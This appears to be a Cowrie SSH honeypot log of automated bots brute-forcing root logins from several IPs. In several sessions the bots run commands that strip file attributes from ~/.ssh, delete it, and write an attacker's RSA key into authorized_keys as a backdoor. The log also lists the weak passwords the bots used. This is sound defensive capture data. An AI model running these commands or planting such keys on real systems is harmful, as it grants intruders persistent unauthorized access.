{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:51.680068Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.login.success","username":"root","password":"Qy123456","message":"login attempt [root/Qy123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:53.381208Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:53.984983Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:53.985806Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:41:53.986880Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:54.255196Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:41:54.808237Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:41:54.808922Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:41:55.081722Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:55.082596Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":50996,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cab3484e7c1","protocol":"ssh","message":"New connection: 27.112.78.245:50996 (1.2.3.4:22) [session: 4cab3484e7c1]","sensor":"my-vps","timestamp":"2025-08-26T00:41:55.342728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:55.343737Z","src_ip":"27.112.78.245","session":"4cab3484e7c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:55.603965Z","src_ip":"27.112.78.245","session":"4cab3484e7c1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:41:56.687591Z","src_ip":"27.112.78.245","session":"4cab3484e7c1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:57.953564Z","src_ip":"27.112.78.245","session":"4cab3484e7c1"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":51002,"dst_ip":"1.2.3.4","dst_port":22,"session":"8523bc867091","protocol":"ssh","message":"New connection: 27.112.78.245:51002 (1.2.3.4:22) [session: 8523bc867091]","sensor":"my-vps","timestamp":"2025-08-26T00:41:58.216045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:41:58.216680Z","src_ip":"27.112.78.245","session":"8523bc867091"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:41:58.478265Z","src_ip":"27.112.78.245","session":"8523bc867091"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:41:59.570825Z","src_ip":"27.112.78.245","session":"8523bc867091"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:59.833488Z","src_ip":"27.112.78.245","session":"95f884e82050"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:41:59.840909Z","src_ip":"27.112.78.245","session":"8523bc867091"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36472,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef3be8b13f5d","protocol":"ssh","message":"New connection: 212.227.235.229:36472 (1.2.3.4:22) [session: ef3be8b13f5d]","sensor":"my-vps","timestamp":"2025-08-26T00:42:04.279366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:04.280539Z","src_ip":"212.227.235.229","session":"ef3be8b13f5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:04.540257Z","src_ip":"212.227.235.229","session":"ef3be8b13f5d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:05.045026Z","src_ip":"212.227.235.229","session":"ef3be8b13f5d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54608,"dst_ip":"1.2.3.4","dst_port":22,"session":"99afbf056d46","protocol":"ssh","message":"New connection: 217.72.205.35:54608 (1.2.3.4:22) [session: 99afbf056d46]","sensor":"my-vps","timestamp":"2025-08-26T00:42:37.215859Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:37.217053Z","src_ip":"217.72.205.35","session":"99afbf056d46"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":55340,"dst_ip":"1.2.3.4","dst_port":22,"session":"8874bd3e1ea2","protocol":"ssh","message":"New connection: 24.108.102.132:55340 (1.2.3.4:22) [session: 8874bd3e1ea2]","sensor":"my-vps","timestamp":"2025-08-26T00:42:38.094447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:38.099269Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:38.267482Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.login.success","username":"root","password":"amir123456","message":"login attempt [root/amir123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:42:38.938425Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:42:39.313198Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.313889Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.314797Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":55034,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df293a8aae1","protocol":"ssh","message":"New connection: 45.159.112.103:55034 (1.2.3.4:22) [session: 8df293a8aae1]","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.356308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.357097Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.463768Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.482013Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:42:39.874614Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.875397Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEasdZXC","message":"login attempt [root/QWEasdZXC] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:42:39.984697Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.044373Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.045354Z","src_ip":"24.108.102.132","session":"8874bd3e1ea2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:42:40.220045Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.220783Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.221812Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":55348,"dst_ip":"1.2.3.4","dst_port":22,"session":"30976ed0070f","protocol":"ssh","message":"New connection: 24.108.102.132:55348 (1.2.3.4:22) [session: 30976ed0070f]","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.223111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.224109Z","src_ip":"24.108.102.132","session":"30976ed0070f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.329771Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:42:40.389894Z","src_ip":"24.108.102.132","session":"30976ed0070f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:42:40.649214Z","src_ip":"45.159.112.103","session":"8df293a8aae1"}
